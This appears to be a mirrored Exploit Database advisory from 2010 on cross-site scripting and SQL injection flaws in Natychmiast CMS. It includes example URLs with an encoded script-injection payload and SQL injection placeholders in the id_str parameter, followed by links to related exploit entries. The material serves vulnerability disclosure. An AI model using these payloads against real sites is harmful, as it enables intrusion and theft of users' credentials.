Natychmiast CMS – Multiple Cross-Site Scripting / SQL Injections

Exploit Database
11 阅读

作者： Maciej Gojny

日期： 2010-03-05
类别：
- webapps
平台：
- php
来源：https://www.exploit-db.com/exploits/33709/

source: https://www.securityfocus.com/bid/38561/info

Natychmiast CMS is prone to multiple cross-site scripting and SQL-injection vulnerabilities.

Exploiting these issues could allow an attacker to steal cookie-based authentication credentials, control how the site is rendered to the user, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. 

http://www.example.com/index.php?id_str=[SQLi]
http://www.example.com/a_index.php?id_str=[SQLi]
http://www.example.com/index.php?id_str='%22%3E%3Cscript%3Ealert(0x000024)%3C/script%3E
http://www.example.com/a_index.php?id_str='%22%3E%3Cscript%3Ealert(0x000024)%3C/script%3E

last Exploits
Natychmiast CMS – Multiple Cross-Site Scripting / SQL Injections的更多信息

Contenido CMS 4.8.12 – Cross-Site Scripting：
CMS Made Simple Showtime2 Module 3.6.2 – (Authenticated) Arbitrary File Upload：
MultiPowUpload 2.1 – Arbitrary File Upload：
CMSQLite – SQL Injection：
EggBlog 4.1.2 – Arbitrary File Upload：
Private Photo+Video 1.1 Pro iOS – Persistent：
Cubic CMS – Multiple Vulnerabilities：
WordPress Plugin BSK PDF Manager – ‘/wp-admin/admin.php’ Multiple SQL Injections：